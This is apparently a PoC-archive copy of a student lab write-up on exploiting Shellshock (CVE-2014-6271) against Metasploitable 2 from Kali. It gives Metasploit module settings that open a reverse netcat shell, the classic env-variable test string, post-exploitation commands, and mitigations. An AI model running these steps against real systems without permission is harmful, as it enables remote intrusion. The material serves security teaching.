关联漏洞
标题:
GNU Bash 远程代码执行漏洞
(CVE-2014-6271)
描述:GNU Bash是美国软件开发者布莱恩-福克斯(Brian J. Fox)为GNU计划而编写的一个Shell(命令语言解释器),它运行于类Unix操作系统中(Linux系统的默认Shell),并能够从标准输入设备或文件中读取、执行命令,同时也结合了一部分ksh和csh的特点。 GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意代码。以下产品和模块可能会被利用:OpenSSH sshd中的ForceComman
介绍
# 🐚 Shellshock (CVE-2014-6271) – Exploitation & Analysis
## 📌 Overview
This is the practical assignment for **Vulnerability Assessment and Penetration Testing – II**, focusing on the exploitation and analysis of the **Shellshock vulnerability** (**CVE-2014-6271**).
Conducted in a **controlled lab environment** using **Metasploitable 2** (target) and **Kali Linux** (attacker).
---
## 🛠 Tools Used
- 💻 **Kali Linux** – Attacker machine
- 🖥 **Metasploitable 2** – Vulnerable target
- 🔍 **Nmap** – Scanning & service detection
- 🎯 **Metasploit Framework** – Exploitation
---
## 🔍 Vulnerability Summary
- **Type:** Remote Code Execution (RCE)
- **Affected Component:** GNU Bash (versions 1.14–4.3)
- **Impact:** Execute arbitrary commands via specially crafted environment variables
- **CVSS Score:** 10.0 (**Critical**)
- **Exploitation Vector:** Often through HTTP headers to CGI scripts
---
## ⚡ Lab Steps
### 1️⃣ Scan Target
```bash
nmap -sS -sV <target-ip>
```
2️⃣ Start Metasploit
```msfconsole```
3️⃣ Load Exploit Module
```use exploit/multi/http/apache_mod_cgi_bash_env_exec```
4️⃣ Configure Exploit
```
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat
```
5️⃣ Run Exploit
```exploit```
📸 Demonstration Includes
📡 Nmap scan results
⚙️ Metasploit configuration
🔄 Reverse shell session output
🛠 Post-exploitation commands:
whoami
uname -a
ifconfig
📖 Theoretical Background
What is Shellshock?
Shellshock is a vulnerability in the GNU Bash shell that allows attackers to execute arbitrary commands by injecting them into environment variables.
Discovered in September 2014 and assigned CVE-2014-6271, it affects Bash v1.14 to v4.3.
How It Works
Bash incorrectly processes function definitions in environment variables and executes extra commands after the function body.
In web servers using CGI scripts, HTTP headers become environment variables, creating an easy attack path.
Example:
env x='() { :;}; echo vulnerable' bash -c "echo test"
If vulnerable, it prints vulnerable.
Impact
Full Remote Code Execution (RCE) without authentication
Exploitable via simple HTTP requests
Used in botnets, worms, targeted attacks
Affected millions of servers, routers, and IoT devices
Real-World Exploits
Yahoo Servers – Malware via CGI scripts
Wopbot Botnet – Automated exploitation
QNAP NAS – Remote shell access & malware
Self-Replicating Worms – Spread to new vulnerable hosts
🛡 Prevention & Mitigation
🔄 Update Bash immediately
🚫 Disable unused CGI scripts
🔥 Use firewalls to block unnecessary traffic
🛡 Deploy Web Application Firewalls (WAF)
📜 Monitor HTTP request logs
👤 Apply Least Privilege principles
⚠️ Disclaimer
This project is for educational purposes only.
All testing was in a controlled lab environment.
❌ Do NOT use these techniques on systems without permission.
👨💻 Author: Janith Madhusankha
🎓 Course: BICT (Hons) in Network & Security
🏫 Institution: South Eastern University of Sri Lanka
文件快照
[4.0K] /data/pocs/273eeae993584702cccd3891e36f4d582cbfd0e3
├── [3.2K] README.md
└── [717K] Shellshock (CVE-2014-6271) Exploitation and Analysis.pdf
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。